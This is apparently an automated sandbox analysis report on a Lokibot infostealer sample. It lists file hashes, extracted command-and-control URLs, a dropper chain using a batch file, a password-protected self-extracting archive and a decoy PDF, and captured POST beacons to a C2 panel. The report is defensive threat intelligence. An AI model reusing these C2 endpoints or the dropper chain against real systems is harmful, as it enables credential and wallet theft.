Analysis

  • max time kernel
    141s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-12-2024 02:10

General

  • Target

    3439eaffe1dfd634b46a29ee7f0e938b5b05f9c784123a70b94f9f46aa370381.exe

  • Size

    733KB

  • MD5

    c27bf6db51f64901ba56cf64003cabd2

  • SHA1

    005e61ccfa9a0840d788bcff2a95cff7ec88d6db

  • SHA256

    3439eaffe1dfd634b46a29ee7f0e938b5b05f9c784123a70b94f9f46aa370381

  • SHA512

    1b3b19272c1d0ae7be07b4be04fbcc58e46b9fedeb31a4292bd3e8a270a2deee22efdd9891a26e708ac5d987b6996cefdac64665a685f52cbfcd54e66eb1d443

  • SSDEEP

    12288:WcrNS33L10QdrX2mVnCGoe0cZKqMEF0JCEharfH0uceMTLlW44UdLZeZ:FNA3R5drXbVCGoRcZDMEwC9UucrjLc

Malware Config

Extracted

Family

lokibot

C2

https://www.stipamana.com/dftjedrshyyj/Panel/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Lokibot family
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3439eaffe1dfd634b46a29ee7f0e938b5b05f9c784123a70b94f9f46aa370381.exe
    "C:\Users\Admin\AppData\Local\Temp\3439eaffe1dfd634b46a29ee7f0e938b5b05f9c784123a70b94f9f46aa370381.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1320
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\sfgdf.bat" "
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3848
      • C:\Users\Admin\AppData\Roaming\segzs.sfx.exe
        segzs.sfx.exe -pgeyhrntdeszopthnymkdetyuhngfszafupbodcsyRhvqxsdfHbgnmeL -dC:\Users\Admin\AppData\Roaming
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4552
        • C:\Users\Admin\AppData\Roaming\segzs.exe
          "C:\Users\Admin\AppData\Roaming\segzs.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5104
          • C:\Users\Admin\AppData\Roaming\segzs.exe
            C:\Users\Admin\AppData\Roaming\segzs.exe
            5⤵
            • Executes dropped EXE
            • Accesses Microsoft Outlook profiles
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:3024
          • C:\Users\Admin\AppData\Roaming\segzs.exe
            C:\Users\Admin\AppData\Roaming\segzs.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:3984
          • C:\Users\Admin\AppData\Roaming\segzs.exe
            C:\Users\Admin\AppData\Roaming\segzs.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:4132
    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\mts103swift.pdf"
      2⤵
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Modifies Internet Explorer settings
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:836
      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1852
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F2DABF2F9771C9F79E2E1779CBC283EB --mojo-platform-channel-handle=1772 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4432
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=2D6E0ABBBA48D6619C60411136957E31 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=2D6E0ABBBA48D6619C60411136957E31 --renderer-client-id=2 --mojo-platform-channel-handle=1792 --allow-no-sandbox-job /prefetch:1
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3384
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3F095C7917672CB9017E7233E55D736C --mojo-platform-channel-handle=2344 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1068
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0ED2A05758D7937368FBDBBDB827BAAB --mojo-platform-channel-handle=1956 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          PID:756
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=D693F4AF69D6E159693028C372B50A4C --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=D693F4AF69D6E159693028C372B50A4C --renderer-client-id=6 --mojo-platform-channel-handle=2364 --allow-no-sandbox-job /prefetch:1
          4⤵
          • System Location Discovery: System Language Discovery
          PID:508
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=EEDD69F4440B00572181E8882399985A --mojo-platform-channel-handle=2564 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5088

Network

  • flag-us
    DNS
    209.205.72.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.205.72.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    20.49.80.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    20.49.80.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    76.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    76.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    www.stipamana.com
    segzs.exe
    Remote address:
    8.8.8.8:53
    Request
    www.stipamana.com
    IN A
    Response
    www.stipamana.com
    IN A
    87.121.86.205
  • flag-bg
    POST
    http://www.stipamana.com/dftjedrshyyj/Panel/five/fre.php
    segzs.exe
    Remote address:
    87.121.86.205:80
    Request
    POST /dftjedrshyyj/Panel/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: www.stipamana.com
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 78FD62C
    Content-Length: 358
    Connection: close
    Response
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Mon, 09 Dec 2024 02:10:25 GMT
    Content-Type: text/html; charset=iso-8859-1
    Content-Length: 229
    Connection: close
  • flag-bg
    POST
    http://www.stipamana.com/dftjedrshyyj/Panel/five/fre.php
    segzs.exe
    Remote address:
    87.121.86.205:80
    Request
    POST /dftjedrshyyj/Panel/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: www.stipamana.com
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 78FD62C
    Content-Length: 180
    Connection: close
    Response
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Mon, 09 Dec 2024 02:10:25 GMT
    Content-Type: text/html; charset=iso-8859-1
    Content-Length: 229
    Connection: close
  • flag-bg
    POST
    http://www.stipamana.com/dftjedrshyyj/Panel/five/fre.php
    segzs.exe
    Remote address:
    87.121.86.205:80
    Request
    POST /dftjedrshyyj/Panel/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: www.stipamana.com
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 78FD62C
    Content-Length: 153
    Connection: close
    Response
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Mon, 09 Dec 2024 02:10:26 GMT
    Content-Type: text/html; charset=iso-8859-1
    Content-Length: 229
    Connection: close
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    205.86.121.87.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    205.86.121.87.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    177.192.25.184.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    177.192.25.184.in-addr.arpa
    IN PTR
    Response
    177.192.25.184.in-addr.arpa
    IN PTR
    a184-25-192-177deploystaticakamaitechnologiescom
  • flag-us
    DNS
    58.55.71.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    58.55.71.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    59.139.73.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    59.139.73.23.in-addr.arpa
    IN PTR
    Response
    59.139.73.23.in-addr.arpa
    IN PTR
    a23-73-139-59deploystaticakamaitechnologiescom
  • flag-us
    DNS
    197.87.175.4.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    197.87.175.4.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    15.164.165.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    15.164.165.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    21.49.80.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    21.49.80.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    133.130.81.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.130.81.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    43.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    43.229.111.52.in-addr.arpa
    IN PTR
    Response
  • 87.121.86.205:80
    http://www.stipamana.com/dftjedrshyyj/Panel/five/fre.php
    http
    segzs.exe
    888 B
    644 B
    6
    6

    HTTP Request

    POST http://www.stipamana.com/dftjedrshyyj/Panel/five/fre.php

    HTTP Response

    404
  • 87.121.86.205:80
    http://www.stipamana.com/dftjedrshyyj/Panel/five/fre.php
    http
    segzs.exe
    710 B
    644 B
    6
    6

    HTTP Request

    POST http://www.stipamana.com/dftjedrshyyj/Panel/five/fre.php

    HTTP Response

    404
  • 87.121.86.205:80
    http://www.stipamana.com/dftjedrshyyj/Panel/five/fre.php
    http
    segzs.exe
    683 B
    644 B
    6
    6

    HTTP Request

    POST http://www.stipamana.com/dftjedrshyyj/Panel/five/fre.php

    HTTP Response

    404
  • 8.8.8.8:53
    209.205.72.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    209.205.72.20.in-addr.arpa

  • 8.8.8.8:53
    20.49.80.91.in-addr.arpa
    dns
    70 B
    145 B
    1
    1

    DNS Request

    20.49.80.91.in-addr.arpa

  • 8.8.8.8:53
    76.32.126.40.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    76.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    www.stipamana.com
    dns
    segzs.exe
    63 B
    79 B
    1
    1

    DNS Request

    www.stipamana.com

    DNS Response

    87.121.86.205

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    205.86.121.87.in-addr.arpa
    dns
    72 B
    132 B
    1
    1

    DNS Request

    205.86.121.87.in-addr.arpa

  • 8.8.8.8:53
    177.192.25.184.in-addr.arpa
    dns
    73 B
    139 B
    1
    1

    DNS Request

    177.192.25.184.in-addr.arpa

  • 8.8.8.8:53
    58.55.71.13.in-addr.arpa
    dns
    70 B
    144 B
    1
    1

    DNS Request

    58.55.71.13.in-addr.arpa

  • 8.8.8.8:53
    59.139.73.23.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    59.139.73.23.in-addr.arpa

  • 8.8.8.8:53
    197.87.175.4.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    197.87.175.4.in-addr.arpa

  • 8.8.8.8:53
    15.164.165.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    15.164.165.52.in-addr.arpa

  • 8.8.8.8:53
    21.49.80.91.in-addr.arpa
    dns
    70 B
    145 B
    1
    1

    DNS Request

    21.49.80.91.in-addr.arpa

  • 8.8.8.8:53
    133.130.81.91.in-addr.arpa
    dns
    72 B
    147 B
    1
    1

    DNS Request

    133.130.81.91.in-addr.arpa

  • 8.8.8.8:53
    43.229.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    43.229.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

    Filesize

    36KB

    MD5

    b30d3becc8731792523d599d949e63f5

    SHA1

    19350257e42d7aee17fb3bf139a9d3adb330fad4

    SHA256

    b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

    SHA512

    523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

  • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

    Filesize

    56KB

    MD5

    752a1f26b18748311b691c7d8fc20633

    SHA1

    c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

    SHA256

    111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

    SHA512

    a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

  • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

    Filesize

    64KB

    MD5

    3970de482154391d7acd9b2c5ce0622c

    SHA1

    8405549bce2618575716c528e726cb98c6200ae7

    SHA256

    e3ef2399fdee9a145f7298d1f85616f8ca54ec84f82970f80747a2b86ff490b4

    SHA512

    85b6c9606fa1c8b2346ecb387c55446b774368a0919af60c84a934129c0fc03ab9c254800ba517cc6ed2e76e61ec2782dc0847447c765ce38e37d3fb0b1c0cb9

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3350944739-639801879-157714471-1000\0f5007522459c86e95ffcc62f32308f1_dd2803c7-d377-4f06-bdfe-aea230fc7b0e

    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

  • C:\Users\Admin\AppData\Roaming\mts103swift.pdf

    Filesize

    43KB

    MD5

    f10334c1dc5e4aec8fffd10387397af2

    SHA1

    a520e2e581be33181af241dab80799813bda5785

    SHA256

    307dd5cbcabfcbfd86b65b45f70fb5fc349b861593b74f36ff6416dd5aa44d1e

    SHA512

    2da918d25e6c50ac2423951b161b9c84833e1d06a978043c7a2ca88952ee625e4a0d3886135d112c846159c80e4ab59862ed95e14d8de9dd3930c6232bd6aecc

  • C:\Users\Admin\AppData\Roaming\segzs.exe

    Filesize

    319KB

    MD5

    e252eca9ccf8de2f046df3b51f6a5973

    SHA1

    0541e65f3018e3edf16832c111dc7a80c46d1b89

    SHA256

    a22ebfe0be1b8df037eac93cc45c3d65b1b12b1d3a889071e52779c4dcd9dceb

    SHA512

    1bf1785b1dee97e905c85f671c829b73eeba911763dc13bafe659ba8b02b8f812ea3cdaa66b59034d1f1d7e4e0011f0b43f9e252cd30372dbd9f1eb675360cdc

  • C:\Users\Admin\AppData\Roaming\segzs.sfx.exe

    Filesize

    555KB

    MD5

    0be398a8808083c20b84daf04d18dee0

    SHA1

    718959fa4ec118470293016ffbc6f5afde595641

    SHA256

    967f6cf0fd1e698deb0cfedf0d017bd1d0c0240f7b8cb654467264d8a17c7e31

    SHA512

    4f42c66f6ea15cdaefad1f7d8daf528301dd3eaa4e5c6148c4d5dd7e2e9bc86817968bf692218c3f82c6bf49e496f48ba7e287419cd5add3e38f2d20eeaf8b8d

  • C:\Users\Admin\AppData\Roaming\sfgdf.bat

    Filesize

    18KB

    MD5

    9c3544830a2edeb178eb4082bf7875e0

    SHA1

    000eec764808b31eb32156ec23061060ec7747a6

    SHA256

    6c69d201f7e4eddf329fedf5184c8d8976ce89cc06442f2e6a225a79c7640516

    SHA512

    3a27c3ae65e4c49af8b43e9d7f0e6a2fcd92d29026306af50005163ff33bf44cd2640c3543c61bd44f7dbfd8d6d072f133a07aed5ce8b7a3bfbc501d8e233680

  • memory/3024-35-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/3024-61-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/3024-33-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/5104-26-0x0000000000940000-0x0000000000996000-memory.dmp

    Filesize

    344KB

  • memory/5104-32-0x00000000051E0000-0x00000000051E6000-memory.dmp

    Filesize

    24KB

  • memory/5104-31-0x00000000053B0000-0x0000000005442000-memory.dmp

    Filesize

    584KB

  • memory/5104-30-0x0000000009D80000-0x000000000A324000-memory.dmp

    Filesize

    5.6MB

  • memory/5104-29-0x0000000009730000-0x00000000097CC000-memory.dmp

    Filesize

    624KB

  • memory/5104-28-0x0000000002AC0000-0x0000000002B1E000-memory.dmp

    Filesize

    376KB

  • memory/5104-27-0x0000000002BA0000-0x0000000002BA6000-memory.dmp

    Filesize

    24KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.